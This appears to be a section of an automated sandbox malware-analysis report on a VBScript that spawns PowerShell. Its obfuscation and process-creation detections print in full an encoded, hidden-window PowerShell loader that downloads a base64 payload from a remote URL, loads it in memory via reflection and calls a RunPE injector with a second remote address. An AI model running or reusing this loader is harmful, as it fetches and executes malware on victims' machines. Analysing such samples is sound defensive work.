              Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32% source: powershell.exe, 00000004.00000002.1819295587.000001C45383C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1852407179.000001C46DA40000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000004.00000002.1851044596.000001C46D7E9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.1834352585.000001C4665DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.1851044596.000001C46D73B000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJyc", "0", "false");
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
              Obfuscated command line found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFE7DC800BD pushad ; iretd 2_2_00007FFE7DC800C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DCA00BD pushad ; iretd 4_2_00007FFE7DCA00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DCA5B27 push ebx; iretd 4_2_00007FFE7DCA5B2A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DD74570 pushad ; retf 4_2_00007FFE7DD74589
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DD75D02 push eax; iretd 4_2_00007FFE7DD75D5E
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
